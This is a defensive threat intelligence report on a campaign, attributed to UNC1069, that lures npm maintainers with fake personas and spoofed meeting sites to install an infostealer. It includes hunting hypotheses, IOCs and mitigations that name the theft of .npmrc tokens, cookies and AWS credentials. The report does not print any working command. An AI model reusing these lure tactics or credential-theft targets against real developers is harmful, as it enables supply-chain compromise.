Attackers Are Hunting High-Impact Node.js Maintainers in a Coordinated Social Engineering Campaign

Key Takeaways

• A coordinated social engineering campaign is targeting high-impact Node.js and npm maintainers to compromise the open-source software supply chain.
• Attackers build long-term rapport via LinkedIn and Slack using fake personas (e.g., 'Openfort') before luring victims to spoofed video conferencing sites.
• Fake meeting platforms (spoofing MS Teams or Streamyard) present technical errors to trick victims into downloading malicious installers or running terminal commands.
• The payload is an infostealer/RAT that bypasses 2FA by exfiltrating session cookies, AWS credentials, and .npmrc tokens.
• The campaign is linked to DPRK-nexus threat actor UNC1069, which has pivoted from targeting the cryptocurrency sector to open-source maintainers.

Affected Systems

• macOS and Windows developer workstations
• Node.js and npm maintainer accounts

Attack Chain

Attackers identify high-impact open-source maintainers and build rapport over several weeks via LinkedIn and Slack using fake personas. They invite the victim to a scheduled video interview on a spoofed conferencing platform. During the call, a fake technical error prompts the victim to download a malicious installer or run a curl command. Once executed, the malware deploys an infostealer/RAT that exfiltrates session cookies, credentials, and .npmrc tokens, allowing attackers to bypass 2FA and publish malicious packages to the npm registry.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No

The article does not provide specific detection rules or queries, focusing instead on the social engineering TTPs, infrastructure patterns, and high-level behavioral indicators.

Detection Engineering Assessment

EDR Visibility: High — EDR solutions are well-positioned to detect the execution of malicious downloaded apps (like StreamYardInstaller.app), suspicious curl commands spawned from browsers, and unauthorized access to sensitive files like .npmrc. Network Visibility: Medium — While C2 traffic (beaconing every 60s) and downloads from spoofed domains can be detected, the initial social engineering occurs over encrypted, legitimate third-party channels (LinkedIn, Slack). Detection Difficulty: Moderate — The social engineering aspect is difficult to detect technically, but the execution phase (downloading fake meeting apps, running curl commands, accessing .npmrc) provides solid behavioral detection opportunities.

Required Log Sources

• Process Creation Logs
• File Access Logs
• DNS Query Logs
• Web Proxy/Gateway Logs

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for unexpected execution of curl or other downloaders originating from web browsers or chat applications.	Process Creation	Execution	Medium
Monitor for unusual processes accessing or exfiltrating developer credential files such as .npmrc, AWS credentials, or SSH keys.	File Access	Credential Access	Low
Identify network connections to newly registered or suspicious domains containing keywords like 'teams', 'zoom', or 'meet' (e.g., teams.onlivemeet.com).	DNS/Network	Command and Control	Medium

Control Gaps

• Multi-Factor Authentication (bypassed via session/token theft)
• Email/Phishing Filters (bypassed by using LinkedIn/Slack)

Key Behavioral Indicators

• Execution of unsigned or suspiciously named conferencing installers (e.g., StreamYardInstaller.app)
• Processes making regular beaconing connections (every 60 seconds)
• Access to browser cookie databases by non-browser processes

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Block known malicious domains (e.g., teams.onlivemeet.com) at the network perimeter.
• Search endpoint telemetry for execution of 'StreamYardInstaller.app' or related suspicious curl commands.
• Revoke and rotate npm tokens, AWS credentials, and session cookies for any maintainers who interacted with the threat actors.

Infrastructure Hardening

• Implement strict endpoint controls to prevent execution of unsigned or unapproved applications.
• Restrict access to sensitive developer files (like .npmrc) to authorized tools only.

User Protection

• Deploy EDR solutions on all developer workstations to monitor for infostealer behavior and credential access.
• Enforce hardware security keys (FIDO2) where possible, while acknowledging that session hijacking still poses a risk.

Security Awareness

• Educate developers and maintainers about advanced social engineering tactics on LinkedIn and Slack.
• Train staff to recognize spoofed video conferencing domains and fake technical error prompts.
• Establish a verification protocol for external meeting invites and software download requests.

MITRE ATT&CK Mapping

• T1566.002 - Phishing: Spearphishing Link
• T1566.003 - Phishing: Spearphishing via Service
• T1582 - Gather Victim Identity Information
• T1204.001 - User Execution: Malicious Link
• T1204.002 - User Execution: Malicious File
• T1059.004 - Command and Scripting Interpreter: Unix Shell
• T1552.004 - Unsecured Credentials: Private Keys
• T1539 - Steal Web Session Cookie
• T1071.001 - Application Layer Protocol: Web Protocols

Additional IOCs

• Domains:
  • teams[.]onlivemeet[.]com - Spoofed Microsoft Teams domain
• File Paths:
  • .npmrc - Targeted configuration file containing npm publishing tokens for exfiltration.
• Command Lines:
  • Purpose: Download and execute payload via terminal as a fallback method | Tools: curl | Stage: Execution | curl
• Other:
  • Joan Alavedra - Threat actor persona used on LinkedIn and Slack
  • Stefaniya Smirnova - Threat actor persona used on Slack
  • joana.personal@proton.me - Threat actor email address